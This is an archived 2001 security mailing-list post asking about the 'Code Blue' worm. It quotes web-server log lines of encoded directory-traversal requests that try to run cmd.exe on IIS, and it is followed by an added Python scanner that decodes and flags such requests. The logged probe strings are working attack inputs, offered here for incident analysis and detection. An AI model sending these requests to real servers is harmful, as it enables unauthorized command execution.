Any one seen any evidence of "Code Blue?"

From: Michael Katz (mikeat_private)
Date: Tue Sep 11 2001 - 19:18:39 PDT


    Hi all,
    
    Why have I not seen anything on this list about the "Code Blue" worm?  I 
    have received some alerts and news stories about a "Code Blue" worm:
    
    http://www.infoworld.com/articles/hn/xml/01/09/07/010907hncodeblue.xml?0907alert
    http://news.cnet.com/news/0-1003-200-7086783.html?tag=lh
    
    A Chinese antivirus software company even has a cleanup tool for it at:
    
    http://www.iduba.net/download/other/tool_010907_CodeBlue.htm
    
    And other antivirus software companies now have virus definitions, 
    explanations of the worm, and cleanup instructions:
    
    http://www.sarc.com/avcenter/venc/data/w32.bluecode.worm.html
    http://vil.mcafee.com/dispVirus.asp?virus_k=99202&
    http://www.f-secure.com/v-descs/codeblue.shtml
    
    Last, but not least, the FBI's Infragard program issued an advisory about 
    it on September 10, 2001.
    
    What is curious is the lack of discussion about it in a forum where I would 
    expect to see it discussed.
    
    Does anyone have a signature for IDS, what it looks like in a web server 
    access log, or packet captures of its file transfer activity?
    
    I submit the following web server access log as a possible candidate, based 
    on its source in Asia, the fact that it is a new pattern we have seen 
    recently, and that it matches the reported infection method:
    
    a.b.c.d - - [10/Sep/2001:20:45:12 -0700] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:45:18 -0700] "GET /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 305 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:45:20 -0700] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:45:24 -0700] "GET /cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:45:38 -0700] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207
    a.b.c.d - - [10/Sep/2001:20:46:02 -0700] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207
    a.b.c.d - - [10/Sep/2001:20:46:04 -0700] "GET /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:46:07 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:46:09 -0700] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:46:12 -0700] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:46:14 -0700] "GET /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:46:18 -0700] "GET /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:46:20 -0700] "GET /cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:46:22 -0700] "GET /cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:46:24 -0700] "GET /scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:46:26 -0700] "GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    a.b.c.d - - [10/Sep/2001:20:46:29 -0700] "GET /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
    
    Does anyone know whether this is indicative of a Code Blue-infected machine, 
    or of some other automated tool?
    
    Michael Katz
    mikeat_private
    Responsible Solutions, Ltd.
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
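
Added example (not part of Michael Katz's post, and not a vendor tool or signature): a small Python log scanner that answers the "what does it look like in a web server access log" question in a mechanical way. It decodes each request path the way the requests in the post expect a permissive IIS to decode them, iterating %-decoding so that %255c, %%35%63, %%35c and %25%35%63 all collapse to a backslash, and accepting overlong UTF-8 such as %c0%af, %c1%9c, %e0%80%af and %f0%80%80%af as '/' or '\', then flags any ".." traversal whose target is cmd.exe. The sample log lines are constructed in the post's Apache combined format with the placeholder client a.b.c.d; five copy request patterns from the post and two are ordinary requests added for contrast. It tells you that a request is a cmd.exe traversal probe, not which worm or tool sent it.

```python
"""Added example: normalise the encoded request paths seen in the post's
access log and flag directory traversal aimed at cmd.exe.  Sample log lines
are constructed (client a.b.c.d is a placeholder), not taken from a live server."""
import re

# Constructed sample: the first five request paths copy patterns from the post,
# the last two are ordinary requests added for contrast.
SAMPLE_LOG = r"""
a.b.c.d - - [10/Sep/2001:20:45:12 -0700] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:45:20 -0700] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:07 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:14 -0700] "GET /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:18 -0700] "GET /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:50:01 -0700] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
a.b.c.d - - [10/Sep/2001:20:50:05 -0700] "GET /scripts/report.asp?id=5 HTTP/1.0" 200 512 "-" "Mozilla/4.0"
"""

# Apache common/combined format: client ident user [time] "METHOD PATH PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>.*?) HTTP/\d\.\d" (?P<status>\d{3}) \S+'
)
HEX = '0123456789abcdefABCDEF'


def percent_decode_once(s: str) -> bytes:
    """One round of %XX decoding.  A '%' not followed by two hex digits is kept,
    which is exactly how %%35%63 becomes %5c and, on the next round, a backslash."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] == '%' and i + 2 < len(s) and s[i + 1] in HEX and s[i + 2] in HEX:
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out.extend(s[i].encode('utf-8', 'surrogatepass'))
            i += 1
    return bytes(out)


def lenient_utf8(b: bytes) -> str:
    """Decode UTF-8 permissively, accepting overlong forms (C0 AF -> '/',
    C1 9C -> '\\', E0 80 AF and F0 80 80 AF -> '/') that a strict decoder rejects.
    Bytes that do not form a sequence pass through as Latin-1."""
    out, i = [], 0
    while i < len(b):
        lead = b[i]
        if 0xC0 <= lead <= 0xDF:
            need = 1
        elif 0xE0 <= lead <= 0xEF:
            need = 2
        elif 0xF0 <= lead <= 0xF7:
            need = 3
        else:
            need = 0
        tail = b[i + 1:i + 1 + need]
        if need and len(tail) == need and all(0x80 <= t <= 0xBF for t in tail):
            cp = lead & (0x7F >> (need + 1))   # payload bits of the lead byte
            for t in tail:
                cp = (cp << 6) | (t & 0x3F)
            if cp <= 0x10FFFF:
                out.append(chr(cp))
                i += 1 + need
                continue
        out.append(chr(lead))
        i += 1
    return ''.join(out)


def normalize_path(raw: str, max_rounds: int = 4) -> str:
    """Decode repeatedly until stable (bounded), then fold '\\' into '/' so that
    ..\\ and ../ compare equal."""
    s = raw
    for _ in range(max_rounds):
        decoded = lenient_utf8(percent_decode_once(s))
        if decoded == s:
            break
        s = decoded
    return s.replace('\\', '/')


def classify(request_path: str) -> dict:
    """Verdict for one request path: traversal-to-cmd.exe, traversal, cmd.exe-request or benign."""
    path, _, query = request_path.partition('?')
    norm = normalize_path(path)
    segments = [seg for seg in norm.split('/') if seg]
    traversal = '..' in segments
    target = segments[-1].lower() if segments else ''
    if traversal and target == 'cmd.exe':
        verdict = 'traversal-to-cmd.exe'
    elif traversal:
        verdict = 'traversal'
    elif target == 'cmd.exe':
        verdict = 'cmd.exe-request'
    else:
        verdict = 'benign'
    return {'normalized': norm, 'query': query, 'target': target, 'verdict': verdict}


def scan_log(text: str) -> list:
    """Parse each log line and attach a verdict; lines that do not parse are skipped."""
    results = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        info = classify(m.group('path'))
        info.update(client=m.group('client'), time=m.group('time'), status=m.group('status'))
        results.append(info)
    return results


if __name__ == '__main__':
    for r in scan_log(SAMPLE_LOG):
        print(f"{r['time']} {r['status']} {r['verdict']:22} {r['normalized']}")
```

Run it as a script to print one verdict per line, or feed a real access log to scan_log(). The decode loop is bounded on purpose: an unbounded "decode until stable" loop is itself a denial-of-service target, and four rounds cover every encoding in the post. Note also that the 404 and 500 status codes in the post do not mean the probe failed elsewhere; they only say this server did not serve cmd.exe, so match on the request, not the response.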
    



    This archive was generated by hypermail 2b30 : Tue Sep 11 2001 - 21:17:31 PDT